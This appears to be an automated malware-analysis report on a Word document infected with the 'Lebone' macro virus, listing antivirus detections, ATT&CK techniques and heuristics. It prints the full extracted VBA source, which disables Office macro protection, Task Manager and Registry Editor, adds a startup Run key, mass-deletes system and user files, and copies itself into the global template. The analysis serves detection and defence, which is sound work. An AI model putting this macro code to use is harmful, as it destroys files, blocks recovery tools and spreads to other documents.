MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1547.001 Registry Run Keys / Startup Folder
T1059.005 Visual Basic
This document contains legacy WordBasic macro virus markers and a VBA AutoOpen macro. The script attempts to disable the Task Manager and Registry Editor by writing to specific registry keys, likely to hinder user intervention. It also displays a misleading message about a virus, aiming to alarm the user. The ClamAV detection as Win.Trojan.Pivis-2 and Doc.Trojan.Lebone-1 further confirms its malicious nature.
Heuristics 6
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6205 bytes |
SHA-256: af839db6b45e6ff490a7893aca61778c81f3a6d64633aa7c3ecb7847e7f1c097 |
|||
|
Detection
ClamAV:
Doc.Trojan.Lebone-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Libon"
'Macro virus name: Lebone
'-------------------------
'Infecta documentos word.
'Infect word documents.
'2005
'-------------------------
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro Lebone"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoOpen"
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
MsgBox " Virus alterou seu computador !!", vbOKOnly + vbCritical, "Word texto informa!!"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") = "1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools") = "1"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Lune") = "Virus ativado"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Universal"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Astral"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Version") = "13A31-Infected "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "VersionNumber") = "1313BA13 Astral "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "ProductName") = "Electron"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Visual") = "C:\ARQUIV~1\Lube.html"
Open "C:\ARQUIV~1\Lube.html" For Output As #1
Print #1, "<html><head><title>Macro virus!</title></head><body bgcolor='#FF0000' link='#FFFF00' vlink='#FF0000'>"
Print #1, "<h6 align='center'><font color='#EEEE00' size='15'><marquee behavior='alternate' width='90%'>Computador com problemas!</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>##############################################</marquee></font>"
Print #1, "<h6 align='center'><font color='#000000' size='15'><marquee behavior='alternate' width='90%'>Word modificado com sucesso!</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color='#00FF00' size='15'><marquee behavior='alternate' width='70%'>Word macro virus!</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Close #1
ActiveDocument.Shapes.AddTextEffect _
PresetTextEffect:=msoTextEffect9, _
Text:="A vida pode ser feliz!!", FontName:="Arial Black", _
FontSize:=36, FontBold:=msoTrue, _
FontItalic:=msoFalse, Left:=1, Top:=1, _
Anchor:=ActiveDocument.Paragraphs(1).Range
WordBasic.Kill "C:\WINDOWS\*.exe"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.exe"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.exe"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.com"
If Day(Now()) = 6 Or (Day(Now)) = 13 Or (Day(Now)) = 17 Or (Day(Now)) = 23 Or (Day(Now)) = 28 Then
MsgBox " Virus modificou seus arquivos!!", vbOKOnly + vbCritical, "Word texto informa!!"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\*.ini"
WordBasic.Kill "C:\WINDOWS\*.txt"
WordBasic.Kill "C:\WINDOWS\*.gif"
WordBasic.Kill "C:\WINDOWS\*.xls"
WordBasic.Kill "C:\WINDOWS\*.pdf"
WordBasic.Kill "C:\*.com"
WordBasic.Kill "C:\*.ini"
WordBasic.Kill "C:\*.txt"
WordBasic.Kill "C:\*.gif"
WordBasic.Kill "C:\*.xls"
WordBasic.Kill "C:\*.pdf"
End If
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro Lebone"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoClose"
On Error Resume Next
ActiveDocument.SaveAs FileName:="C:\Lubir.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\System\Igon.sys"
ActiveDocument.SaveAs FileName:="C:\Program Files\Lubi.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\Command\Nidun.sys"
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
binstalled = -1
End If
If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
bTooMuchTrouble = -1
End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
sMe$ = WordBasic.[FileName$]()
sMacro$ = sMe$ + ":Libon"
WordBasic.MacroCopy sMacro$, "Global:Libon"
sMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:Libon"
ActiveDocument.Save
End If
End Sub
Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Macro Lebone"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Libon.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
'Infecta documentos word.
'Infect word documents.
'Word Macro virus
'=========================
'Ano 2005
'-------------------------
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.